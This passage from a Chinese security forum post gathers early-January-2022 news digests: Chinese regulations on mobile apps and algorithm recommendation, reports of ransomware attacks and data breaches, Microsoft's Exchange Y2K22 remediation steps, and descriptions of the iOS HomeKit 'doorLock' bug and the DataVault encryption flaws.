第二十四条 网信部门会同有关主管部门建立健全工作机制,监督指导应用程序提供者和应用程序分发平台依法依规从事信息服务活动。

应用程序提供者和应用程序分发平台应当对有关主管部门依法实施的监督检查予以配合,并提供必要的技术支持和协助。

第二十五条 应用程序提供者和应用程序分发平台违反本规定的,由网信部门和有关主管部门在职责范围内依照相关法律法规处理。


第五章 附 则

第二十六条 本规定所称移动互联网应用程序,是指运行在移动智能终端上向用户提供信息服务的应用软件。

本规定所称移动互联网应用程序提供者,是指提供信息服务的移动互联网应用程序所有者或者运营者。

本规定所称移动互联网应用程序分发平台,是指提供移动互联网应用程序发布、下载、动态加载等分发服务的互联网信息服务提供者。

第二十七条 本规定自2022年 月 日起施行。

(来源:中国网信网)


【阅读原文】



2、葡萄牙最大媒体集团遭勒索软件攻击,网站瘫痪


新年伊始,葡萄牙最大的电视台和报纸媒体Impresa就遭到勒索软件攻击而瘫痪,这也是国家级媒体服务首次因勒索软件攻击而长时间中断。袭击背后的可疑勒索软件团伙名为Lapsus$。


这次攻击波及媒体巨头Impresa旗下的主要网站在周二早仍然保持离线状态。据悉,受影响的是对Impresa运营至关重要的服务器基础设施。此外,Impresa的一个经过官方验证的Twitter帐户也被劫持并被用来公开嘲讽该公司。


安全分析公司Recorded Future周一发表的一篇博客文章称,“葡萄牙国家电台和有线电视广播正常运行,但这次攻击已经影响了SIC的互联网流媒体功能。”


“Impresa集团确认其Expresso和SIC网站以及他们的一些社交媒体页面遭攻击暂时不可用,正在采取缓解措施。”Impresa的推文指出。


根据The Record在线发布的说明截图,勒索软件组织Lapsus$宣布对此次攻击负责,并声称勒索软件攻击已经导致Impresa的所有网站下线,而且还获得了Impresa的亚马逊网络服务帐户的访问权限。


据Recorded Future称,Lapsus$继续通过Twitter向Impresa施加压力,周一从Expresso的经过验证的Twitter帐户发推文,以证明它仍然可以访问公司资源。


葡萄牙国家网络安全中心协调员利诺桑托斯告诉《观察家报》,到目前为止,该公司和Lapsus$都没有透露与该事件相关的勒索金额,这是该组织首次攻击葡萄牙的实体。


Lapsus$ Group于2021年出现在勒索软件领域,迄今为止最著名的是上个月对巴西卫生部的攻击。该攻击摧毁了几个在线系统,成功清除了有关公民新冠疫苗接种数据的信息,并破坏了签发数字疫苗接种证书的系统。


此次攻击表明,2021年勒索软件攻击的迅猛势头在新的一年没有任何放缓的迹象。


【阅读原文】



3、中国首个互联网货运安全运营标准发布


1月5日消息,近日,中国交通运输协会发布了《互联网货运平台安全运营规范》(下称《规范》)团体标准,这是中国首个互联网货运安全团体标准,该团标将于2022年3月1日起正式实施。

该《规范》规定了互联网货运平台安全运营的总体要求、平台安全功能、驾驶员与车辆审核、驾驶员安全管理、安全运营、风险管理与隐患排查、应急与处置、网络与信息安全管理、安全事故事件投诉处理、绩效评定与改进等共计10个方面58项条款,明确了互联网货运平台企业的安全运营管理标准。


其中,《规范》明确,互联网货运平台是指依托互联网、大数据、人工智能等整合配置运输资源,从事道路货物运输服务的平台,包括网络货运平台和货运交易撮合平台。


在安全运营方面,《规范》要求,平台企业应分别与托运人、驾驶员签订服务协议,并明确平台企业、托运人、驾驶员需履行的安全职责。平台企业宜在驾驶员接单前,通过生物活体识别技术进行人的一致性验证,确保线上确定的驾驶员和线下实际提供服务的驾驶员一致。


在平台安全功能方面,《规范》明确,互联网货运平台应具备在途跟踪监控、用户隐私号码保护、装卸货安全监控、路径偏航识别和预警、行驶状态异常、疲劳驾驶提醒等方面的功能。


据悉,在2021年4月1日,上海多部门约谈货拉拉、快狗打车等网络货运平台。上海市交通委执法总队表示,网约货运平台安全责任不应被弱化,不管如何发展,安全都是一个短板,如果安全问题上不去,隐患和事故就一直存在。

【阅读原文】



2022年1月5日 星期三

今日资讯速览:

1、四部门联合发布《互联网信息服务算法推荐管理规定》(附全文)


2、美国在线商店 PulseTV 披露了信用卡数据泄露,超过 200,000 名客户受到影响


3、美医疗系统Broward Health披露数据泄露事件 影响超130万人



1、四部门联合发布《互联网信息服务算法推荐管理规定》(附全文)


近日,国家互联网信息办公室、工业和信息化部、公安部、国家市场监督管理总局联合发布《互联网信息服务算法推荐管理规定》(以下简称《规定》),自2022年3月1日起施行。国家互联网信息办公室有关负责人表示,出台《规定》,旨在规范互联网信息服务算法推荐活动,维护国家安全和社会公共利益,保护公民、法人和其他组织的合法权益,促进互联网信息服务健康发展。


国家互联网信息办公室

中华人民共和国工业和信息化部

中华人民共和国公安部

国家市场监督管理总局


第9号


《互联网信息服务算法推荐管理规定》已经2021年11月16日国家互联网信息办公室2021年第20次室务会议审议通过,并经工业和信息化部、公安部、国家市场监督管理总局同意,现予公布,自2022年3月1日起施行。


国家互联网信息办公室主任 庄荣文

工业和信息化部部长 肖亚庆

公安部部长 赵克志

国家市场监督管理总局局长 张工

2021年12月31日



互联网信息服务算法推荐管理规定


第一章 总 则

第一条 为了规范互联网信息服务算法推荐活动,弘扬社会主义核心价值观,维护国家安全和社会公共利益,保护公民、法人和其他组织的合法权益,促进互联网信息服务健康有序发展,根据《中华人民共和国网络安全法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》、《互联网信息服务管理办法》等法律、行政法规,制定本规定。

第二条 在中华人民共和国境内应用算法推荐技术提供互联网信息服务(以下简称算法推荐服务),适用本规定。法律、行政法规另有规定的,依照其规定。

前款所称应用算法推荐技术,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。

第三条 国家网信部门负责统筹协调全国算法推荐服务治理和相关监督管理工作。国务院电信、公安、市场监管等有关部门依据各自职责负责算法推荐服务监督管理工作。

地方网信部门负责统筹协调本行政区域内的算法推荐服务治理和相关监督管理工作。地方电信、公安、市场监管等有关部门依据各自职责负责本行政区域内的算法推荐服务监督管理工作。

第四条 提供算法推荐服务,应当遵守法律法规,尊重社会公德和伦理,遵守商业道德和职业道德,遵循公正公平、公开透明、科学合理和诚实信用的原则。

第五条 鼓励相关行业组织加强行业自律,建立健全行业标准、行业准则和自律管理制度,督促指导算法推荐服务提供者制定完善服务规范、依法提供服务并接受社会监督。


第二章 信息服务规范

第六条 算法推荐服务提供者应当坚持主流价值导向,优化算法推荐服务机制,积极传播正能量,促进算法应用向上向善。

算法推荐服务提供者不得利用算法推荐服务从事危害国家安全和社会公共利益、扰乱经济秩序和社会秩序、侵犯他人合法权益等法律、行政法规禁止的活动,不得利用算法推荐服务传播法律、行政法规禁止的信息,应当采取措施防范和抵制传播不良信息。

第七条 算法推荐服务提供者应当落实算法安全主体责任,建立健全算法机制机理审核、科技伦理审查、用户注册、信息发布审核、数据安全和个人信息保护、反电信网络诈骗、安全评估监测、安全事件应急处置等管理制度和技术措施,制定并公开算法推荐服务相关规则,配备与算法推荐服务规模相适应的专业人员和技术支撑。

第八条 算法推荐服务提供者应当定期审核、评估、验证算法机制机理、模型、数据和应用结果等,不得设置诱导用户沉迷、过度消费等违反法律法规或者违背伦理道德的算法模型。

第九条 算法推荐服务提供者应当加强信息安全管理,建立健全用于识别违法和不良信息的特征库,完善入库标准、规则和程序。发现未作显著标识的算法生成合成信息的,应当作出显著标识后,方可继续传输。

发现违法信息的,应当立即停止传输,采取消除等处置措施,防止信息扩散,保存有关记录,并向网信部门和有关部门报告。发现不良信息的,应当按照网络信息内容生态治理有关规定予以处置。

第十条 算法推荐服务提供者应当加强用户模型和用户标签管理,完善记入用户模型的兴趣点规则和用户标签管理规则,不得将违法和不良信息关键词记入用户兴趣点或者作为用户标签并据以推送信息。

第十一条 算法推荐服务提供者应当加强算法推荐服务版面页面生态管理,建立完善人工干预和用户自主选择机制,在首页首屏、热搜、精选、榜单类、弹窗等重点环节积极呈现符合主流价值导向的信息。

第十二条 鼓励算法推荐服务提供者综合运用内容去重、打散干预等策略,并优化检索、排序、选择、推送、展示等规则的透明度和可解释性,避免对用户产生不良影响,预防和减少争议纠纷。

第十三条 算法推荐服务提供者提供互联网新闻信息服务的,应当依法取得互联网新闻信息服务许可,规范开展互联网新闻信息采编发布服务、转载服务和传播平台服务,不得生成合成虚假新闻信息,不得传播非国家规定范围内的单位发布的新闻信息。

第十四条 算法推荐服务提供者不得利用算法虚假注册账号、非法交易账号、操纵用户账号或者虚假点赞、评论、转发,不得利用算法屏蔽信息、过度推荐、操纵榜单或者检索结果排序、控制热搜或者精选等干预信息呈现,实施影响网络舆论或者规避监督管理行为。

第十五条 算法推荐服务提供者不得利用算法对其他互联网信息服务提供者进行不合理限制,或者妨碍、破坏其合法提供的互联网信息服务正常运行,实施垄断和不正当竞争行为。


第三章 用户权益保护

第十六条 算法推荐服务提供者应当以显著方式告知用户其提供算法推荐服务的情况,并以适当方式公示算法推荐服务的基本原理、目的意图和主要运行机制等。

第十七条 算法推荐服务提供者应当向用户提供不针对其个人特征的选项,或者向用户提供便捷的关闭算法推荐服务的选项。用户选择关闭算法推荐服务的,算法推荐服务提供者应当立即停止提供相关服务。

算法推荐服务提供者应当向用户提供选择或者删除用于算法推荐服务的针对其个人特征的用户标签的功能。

算法推荐服务提供者应用算法对用户权益造成重大影响的,应当依法予以说明并承担相应责任。

第十八条 算法推荐服务提供者向未成年人提供服务的,应当依法履行未成年人网络保护义务,并通过开发适合未成年人使用的模式、提供适合未成年人特点的服务等方式,便利未成年人获取有益身心健康的信息。

算法推荐服务提供者不得向未成年人推送可能引发未成年人模仿不安全行为和违反社会公德行为、诱导未成年人不良嗜好等可能影响未成年人身心健康的信息,不得利用算法推荐服务诱导未成年人沉迷网络。

第十九条 算法推荐服务提供者向老年人提供服务的,应当保障老年人依法享有的权益,充分考虑老年人出行、就医、消费、办事等需求,按照国家有关规定提供智能化适老服务,依法开展涉电信网络诈骗信息的监测、识别和处置,便利老年人安全使用算法推荐服务。

第二十条 算法推荐服务提供者向劳动者提供工作调度服务的,应当保护劳动者取得劳动报酬、休息休假等合法权益,建立完善平台订单分配、报酬构成及支付、工作时间、奖惩等相关算法。

第二十一条 算法推荐服务提供者向消费者销售商品或者提供服务的,应当保护消费者公平交易的权利,不得根据消费者的偏好、交易习惯等特征,利用算法在交易价格等交易条件上实施不合理的差别待遇等违法行为。

第二十二条 算法推荐服务提供者应当设置便捷有效的用户申诉和公众投诉、举报入口,明确处理流程和反馈时限,及时受理、处理并反馈处理结果。


第四章 监督管理

第二十三条 网信部门会同电信、公安、市场监管等有关部门建立算法分级分类安全管理制度,根据算法推荐服务的舆论属性或者社会动员能力、内容类别、用户规模、算法推荐技术处理的数据重要程度、对用户行为的干预程度等对算法推荐服务提供者实施分级分类管理。

第二十四条 具有舆论属性或者社会动员能力的算法推荐服务提供者应当在提供服务之日起十个工作日内通过互联网信息服务算法备案系统填报服务提供者的名称、服务形式、应用领域、算法类型、算法自评估报告、拟公示内容等信息,履行备案手续。

算法推荐服务提供者的备案信息发生变更的,应当在变更之日起十个工作日内办理变更手续。

算法推荐服务提供者终止服务的,应当在终止服务之日起二十个工作日内办理注销备案手续,并作出妥善安排。

第二十五条 国家和省、自治区、直辖市网信部门收到备案人提交的备案材料后,材料齐全的,应当在三十个工作日内予以备案,发放备案编号并进行公示;材料不齐全的,不予备案,并应当在三十个工作日内通知备案人并说明理由。

第二十六条 完成备案的算法推荐服务提供者应当在其对外提供服务的网站、应用程序等的显著位置标明其备案编号并提供公示信息链接。

第二十七条 具有舆论属性或者社会动员能力的算法推荐服务提供者应当按照国家有关规定开展安全评估。

第二十八条 网信部门会同电信、公安、市场监管等有关部门对算法推荐服务依法开展安全评估和监督检查工作,对发现的问题及时提出整改意见并限期整改。

算法推荐服务提供者应当依法留存网络日志,配合网信部门和电信、公安、市场监管等有关部门开展安全评估和监督检查工作,并提供必要的技术、数据等支持和协助。

第二十九条 参与算法推荐服务安全评估和监督检查的相关机构和人员对在履行职责中知悉的个人隐私、个人信息和商业秘密应当依法予以保密,不得泄露或者非法向他人提供。

第三十条 任何组织和个人发现违反本规定行为的,可以向网信部门和有关部门投诉、举报。收到投诉、举报的部门应当及时依法处理。


第五章 法律责任

第三十一条 算法推荐服务提供者违反本规定第七条、第八条、第九条第一款、第十条、第十四条、第十六条、第十七条、第二十二条、第二十四条、第二十六条规定,法律、行政法规有规定的,依照其规定;法律、行政法规没有规定的,由网信部门和电信、公安、市场监管等有关部门依据职责给予警告、通报批评,责令限期改正;拒不改正或者情节严重的,责令暂停信息更新,并处一万元以上十万元以下罚款。构成违反治安管理行为的,依法给予治安管理处罚;构成犯罪的,依法追究刑事责任。

第三十二条 算法推荐服务提供者违反本规定第六条、第九条第二款、第十一条、第十三条、第十五条、第十八条、第十九条、第二十条、第二十一条、第二十七条、第二十八条第二款规定的,由网信部门和电信、公安、市场监管等有关部门依据职责,按照有关法律、行政法规和部门规章的规定予以处理。

第三十三条 具有舆论属性或者社会动员能力的算法推荐服务提供者通过隐瞒有关情况、提供虚假材料等不正当手段取得备案的,由国家和省、自治区、直辖市网信部门予以撤销备案,给予警告、通报批评;情节严重的,责令暂停信息更新,并处一万元以上十万元以下罚款。

具有舆论属性或者社会动员能力的算法推荐服务提供者终止服务未按照本规定第二十四条第三款要求办理注销备案手续,或者发生严重违法情形受到责令关闭网站、吊销相关业务许可证或者吊销营业执照等行政处罚的,由国家和省、自治区、直辖市网信部门予以注销备案。


第六章 附 则

第三十四条 本规定由国家互联网信息办公室会同工业和信息化部、公安部、国家市场监督管理总局负责解释。

第三十五条 本规定自2022年3月1日起施行。

(来源:中国网信网)


【阅读原文】



2、美国在线商店 PulseTV 披露了信用卡数据泄露,超过 200,000 名客户受到影响


       根据缅因州总检察长办公室发布的通知函,VISA 于 2021 年 3 月 8 日通知该公司,其网站(www.pulsetv.com)是一些未经授权的信用卡交易的常见购买点,因为可能的妥协。该公司对其网站进行了一些安全检查,但没有发现任何妥协迹象。


       7 月,该公司在 7 月再次收到 VISA 警报,但仅在几个月后,执法部门就通知它有关似乎源自其网站的其他支付卡泄露事件。该公司开始聘请法律顾问,聘请网络安全专家协助调查。


       2021 年 11 月 18 日,调查人员意识到该网站已被确定为万事达卡多次未经授权的信用卡交易的常见购买点。


       调查人员了解到,该网站已被确定为万事达卡多次未经授权的信用卡交易的常见购买点。根据与信用卡品牌的沟通,相信只有在 2019 年 11 月 1 日至 2021 年 8 月 31 日期间使用信用卡在网站上购买产品的客户可能会受到影响。调查无法证实该网站是未经授权交易的原因。但是,出于谨慎的考虑,PulseTV 会通知在此期间在我们网站上购买产品的客户(包括您),以便他们可以采取措施保护自己的信用卡信息。


       PulseTV 认为,只有在 2019 年 11 月 1 日至 2021 年 8 月 31 日期间使用信用卡在网站上购买产品的客户才会受到影响。


可能已泄露的信息包括:

  • 全名

  • 收件地址

  • 电子邮件地址

  • 支付卡号

  • 支付卡有效期

  • 支付卡安全码 (CVV)

公司将采取以下措施防止今后发生类似事件:

  • 为所有内部设备添加两因素身份验证要求;


  • 利用端点检测和响应工具提供更好的网络可见性和威胁缓解;


  • 迁移到不同的支付系统。

       该公司仍在调查支付卡网络和执法部门的安全漏洞,并正在通知州监管机构和受影响的客户。目前,该公司尚未确定它是否是Magecart攻击的受害者,还是被盗卡仅用于 PulseTV 用于兑现。


       “我们建议您通过定期查看您的帐户报表并监控免费信用报告中是否有任何未经授权的活动,对欺诈和身份盗用事件保持警惕。有关保护您的信息的其他方法的信息,包括如何获得免费信用报告和免费安全冻结。您应该向当地执法部门和州检察长报告任何涉嫌身份盗窃的事件。如果您认为您的支付卡信息可能已被泄露,我们强烈建议您联系您的支付卡公司和/或金融机构并要求取消该卡。”

【阅读原文】



3、美医疗系统Broward Health披露数据泄露事件 影响超130万人


美国Broward Health公共卫生系统近日披露了一起大规模数据泄露事件,影响到1357879人。Broward Health是一个位于佛罗里达州的医疗系统,有三十多个地点提供广泛的医疗服务,每年接收超过60000名入院病人。

broward-health.jpg

该医疗系统在2021年10月15日披露了一起网络攻击事件,当时一名入侵者未经授权访问了医院的网络和病人数据。该组织在四天后,即10月19日发现了这次入侵事件,并立即通知了美国联邦调查局和美国司法部。


同时,所有员工被建议更改他们的用户密码,Broward Health与第三方网络安全专家签约,帮助进行调查。


调查显示,入侵网站的黑客获得了病人的个人医疗信息,其中可能包括以下内容:

  • 全名

  • 出生日期

  • 实际地址

  • 电话号码

  • 财务或银行信息

  • 社会安全号码

  • 保险信息和账户号码

  • 医疗信息和历史

  • 病情、治疗和诊断

  • 驾照号码

  • 电子邮件地址

尽管Broward Health确认黑客已经泄露了上述数据,但它指出,没有证据表明他们滥用了这些数据。值得注意的是,入侵点被确定为一个第三方医疗机构,他们被允许进入系统以提供服务。


“为了应对这一事件,Broward Health正在采取措施防止类似事件的再次发生,其中包括正在进行的调查,在整个企业中加强安全措施的密码重置,以及对其系统的所有用户实施多因素认证,”Broward Health在向受影响的病人和雇员数据泄露通知解释称。


“我们还开始对不由Broward Health信息技术公司管理的访问我们网络的设备实施额外的最低安全要求,这些要求将于2022年1月生效。”


由于暴露数据的关键性质,通知的接收者需要对所有形式的通信保持警惕。此外,该医疗系统正在通过Experian提供为期两年的身份盗窃检测和保护服务,信中还附有如何注册的详细信息。

【阅读原文】



2022年1月4日 星期二

今日资讯速览:

1、微软发布导致Exchange服务器故障的FIP-FS Y2K22漏洞修复方案


2、外媒:与朝鲜有联系的威胁行为者从加密货币交易所窃取了17亿美元


3、安全人员披露iOS漏洞:利用HomeKit让iPhone瘫痪



1、微软发布导致Exchange服务器故障的FIP-FS Y2K22漏洞修复方案


就在前天跨年时,微软的Exchange用户被一个2022年虫影响,该错误阻止了电子邮件的发送。FIP-FS反恶意软件扫描器中的"2022年"日期移出错误导致系统提示"FIP-FS扫描过程初始化失败。这个错误让许多系统管理员的跨年夜庆祝活动戛然而止,微软在假期也没有闲着,短短两天就针对这一问题发布了一个官方修复。


任何遇到该问题的人都可以手动应用该修复程序,或使用自动脚本来处理故障。


微软在其支持论坛的帖子中说:"我们已经创建了一个解决方案,以解决Exchange Server 2016和Exchange Server 2019上的消息卡在传输队列中的问题,因为Exchange Server内的恶意软件扫描引擎使用的签名文件中有一个潜在的日期问题。当问题发生时,你会在Exchange服务器上的应用程序事件日志中看到错误,特别是事件5300和1106(FIPFS)"。


该公司表示,用户可以访问https://aka.ms/ResetScanEngineVersion,以应用一个修复程序,或者他们可以使用一个手动选项来代替。

微软解释说。

为了代替使用脚本,客户也可以手动执行步骤来解决这个问题并恢复服务。要手动解决这个问题,你必须在你组织的每台Exchange服务器上执行以下步骤。

删除现有的引擎和元数据

1. 停止微软过滤管理服务。 当提示您同时停止Microsoft Exchange传输服务时,请点击“是”。

2. 使用任务管理器以确保 updateservice.exe 没有运行。

3. 删除以下文件夹:%ProgramFiles%\Microsoft\Exchange Server\V15\FIP-FS\Data\Engines\AMD64\Microsoft。

4. 移除以下文件夹中的所有文件:%ProgramFiles%\MicrosoftExchange Server\V15\FIP-FS\Data\Engines\metADATA。

更新到最新的引擎

1. 启动Microsoft过滤管理服务和Microsoft Exchange传输服务。

2. 打开Exchange管理壳,导航到Scripts文件夹(%ProgramFiles%\Microsoft\Exchange Server\V15\Scripts),并运行Update-MalwareFilteringServer.ps1 <server FQDN>。

验证引擎更新信息

1. 在 Exchange Management Shell 中,运行 Add-PSSnapin Microsoft.Forefront.Filtering.Management.Powershell。

2. 2.运行Get-EngineUpdateInformation,验证UpdateVersion信息为2112330001。

更新引擎后,还建议验证邮件流是否正常,以及应用程序事件日志中是否存在FIPFS错误事件。


相关文章:

微软2022年第一号bug让大量程序员连夜加班 只因日期数据溢出


【阅读原文】



2、外媒:与朝鲜有联系的威胁行为者从加密货币交易所窃取了17亿美元



————————————————

原文作者:全球网络安全资讯

转自链接:https://www.wangan.com/p/7fy7fg40dc500db9

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



3、安全人员披露iOS漏洞:利用HomeKit让iPhone瘫痪


近日安全研究人员披露了存在于 iOS 系统中的漏洞,使用 HomeKit 进行攻击,而且苹果修复该漏洞的速度非常缓慢。安全研究员 Trevor Spiniolas 称,如果 HomeKit 设备名称被改为一个“很长的字符串”,在测试中设定为 50 万个字符,加载该字符串的 iOS 和 iPadOS 设备就会被重新启动并无法使用。

QQ截图20220102085225.webp

此外,由于该名称存储在 iCloud 中,并在登录到同一账户的所有其他 iOS 设备中得到更新,该错误可能会反复出现。


Spiniolas 称这个漏洞为“doorLock”,并声称它影响到测试中的 iOS 14.7 以上的所有 iOS 版本,尽管它也可能存在于所有 iOS 14 版本中。


此外,虽然 iOS 15.0 /15.1 中的更新对应用程序或用户可以设置的名称长度进行了限制,但以前的 iOS 版本仍然可以更新名称。如果该错误在没有限制的 iOS 版本上被触发,并共享 HomeKit 数据,那么与之共享数据的所有设备也将受到影响,无论版本如何。


这会导致两种情况发生,在控制中心没有启用 Home 设备的设备会发现 Home 应用无法使用并崩溃。重启或更新都不能解决这个问题,恢复的设备如果签入同一个 iCloud 账户,将再次使 Home 无法使用。


对于在控制中心启用了Home设备的iPhone和iPad,也就是用户访问HomeKit设备时的默认设置,iOS本身变得毫无反应。输入变得延迟或被忽略,设备没有反应,偶尔会经历重启。


在这种情况下,重启或更新设备都无法解决,而中断的USB访问基本上会迫使用户恢复设备并丢失所有本地数据。然而,恢复和签署到同一iCloud账户将再次触发该错误,其效果与之前相同。


Spiniolas认为这个问题可能被用于恶意的目的,比如通过一个可以访问家庭数据的应用程序自己引入这个错误。攻击者向其他用户发送对Home的邀请也是可行的,即使目标不拥有HomeKit设备。


据研究人员称,通过在控制中心禁用Home设备,可以避免这两种情况中最糟糕的情况。要做到这一点,打开"设置"和"控制中心",然后将"显示家庭控制"的切换设置为关闭。用户还应该对加入其他用户的家庭网络的邀请保持警惕,特别是那些来自未知联系人的邀请。


Spiniolas声称,他最初在8月10日向苹果公司报告了这个错误,据说苹果公司计划在2022年底前发布修复该错误的安全更新。然而,据称苹果随后在12月8日将其估计改为"2022年初"。


该研究人员写道:“我认为这个bug的处理是不恰当的,因为它给用户带来了严重的风险,而且很多个月过去了,没有得到全面的修复。公众应该知道这个漏洞以及如何防止它被利用,而不是被蒙在鼓里”。

【阅读原文】



2022年1月3日 星期一

今日资讯速览:

1、报纸停印 挪威第二大媒体集团遭黑客勒索


2、世嘉某欧洲服务器中门大开 25万用户数据受影响


3、DataVault 加密软件中的漏洞影响多个存储设备



1、报纸停印 挪威第二大媒体集团遭黑客勒索


新华社消息 挪威第二大媒体集团A传媒公司29日说,由于遭黑客勒索,公司在可预计的未来将暂停印刷部分报纸。


A传媒公司说,多名黑客27日夜间至28日入侵公司计算机系统,控制多台服务器,索要赎金。公司因此无法印刷部分报纸,广告和订阅系统也受到影响。广告商无法购买新广告,订阅用户也无法订购或取消订单。


按照公司说法,尚不清楚个人数据是否遭泄露。


A传媒公司信息技术部门主管波尔·内德雷戈滕告诉挪威国家广播电台,这是“典型的勒索软件病毒攻击,黑客入侵部分服务器、加密我们的数据”,但公司不会与其就赎金问题对话。


内德雷戈滕说,恢复服务器需要“下苦功”,预计这一过程将耗费“相当长时间”。


按照公司说法,它出版约100种报纸。目前部分地方性报纸的纸质版无法印刷,但电子版不受影响。公司表示,最近应该能恢复约20种报纸的印刷。

【阅读原文】



2、世嘉某欧洲服务器中门大开 25万用户数据受影响


据安全研究中心 VPN Overview 的发现,世嘉其中一个位于欧洲的服务器因为 Amazon Web Services S3 简易储存服务的设定有误,让黑客可以任意上载档案到世嘉域名的网站,其中更涉及 25 万名用户的电邮资料。

explanation-sega-vulnerabilities-hack-infographic-updated.webp

所谓的 SEGA 域名,是包括了众多著名游戏的官方网站,像是《索尼克》、《猎天使魔女》、《全面战争》等系列游戏,当然也有 sega.com 在内的。VPNO 表示他们可以在这些网站里执行任何的指令。同时不当储存的 MailchimpAPI 密匙,就能让 VPNO 查看到受影响用户的登入电邮、密码、IP 地址,带来极大的资安风险。

Capture.webp

幸好目前没有证据显示世嘉服务器的漏洞有被 VPNO 以外的第三方发现,而 SEGA 欧洲就没有回应查询。


是说,Services S3 简易储存服务的设定是蛮经常出现错误设定,Sennheiser、Senior Advisor、PeopleGIS,甚至是加纳政府的网站也曾经发生过。至于 SEGA 自身更是曾经在 2011 年时就曾成为 130 万名用户数据外泄的源头,现在再有网络安全隐患的出现,实在叫人担心。

【阅读原文】



3、DataVault 加密软件中的漏洞影响多个存储设备


研究员 Sylvain Pelissier 发现,由 ENC Security 制造并被多家供应商使用的 DataVault 加密软件受到几个密钥派生函数问题的影响。攻击者可以利用该漏洞获取用户密码。


本周 Pelissier 在 Chaos Computer Club 的 Remote Chaos Experience (rC3) 虚拟会议上详细介绍了这些漏洞。


DataVault 是一种保护用户数据的高级加密软件,它为多个系统提供全面的军用级数据保护和安全功能。


包括 WD、Sony 和 Lexar 在内的多个供应商都在使用 DataVault 软件。


Pelissier 通过软件的逆向工程发现了这些问题。


“原来密钥推导函数是 PBKDF2,使用 1000 次 MD5 迭代来推导加密密钥。用于派生密钥的盐在所有解决方案和所有供应商中都是恒定的和硬编码的。这使得攻击者可以更容易地使用时间 / 内存权衡攻击技术(例如彩虹表)来猜测保管库的用户密码,并重新使用这些表来检索使用该软件的所有用户的密码。实现本身是不正确的,即使使用随机生成的唯一盐,也可以毫不费力地恢复用户的密码。将讨论密钥派生函数的其他缺陷,并将其与当今的良好做法进行比较。” 读取演示的 RC3 网站上发表的讲话。


“还发现数据加密方法具有延展性,允许在没有任何检测的情况下恶意修改保管库中的文件。没有建立数据完整性机制。”


这些漏洞已被跟踪为 CVE-2021-36750 和 CVE-2021-36751。


“DataVault 及其衍生产品使用单向加密散列和可预测的盐分,使其容易受到恶意用户的字典攻击。该软件还使用了计算量不足的密码哈希,这将允许攻击者暴力破解用户密码,从而导致对用户数据的未授权访问。” 阅读 ENC 发布的安全公告。“上述两个密钥派生函数问题都已在更新版本的 DataVault 7.2 中得到解决。”


————————————————

原文作者:Simon

转自链接:https://www.wangan.com/p/7fy7471e9c0b2013

版权声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请保留以上作者信息和原文链接。



[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2022-1-28 10:54 被Editor编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (1)
雪    币: 951
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
2
哦,还有 这种情况发生。
2022-1-14 08:52
0
游客
登录 | 注册 方可回帖
返回
//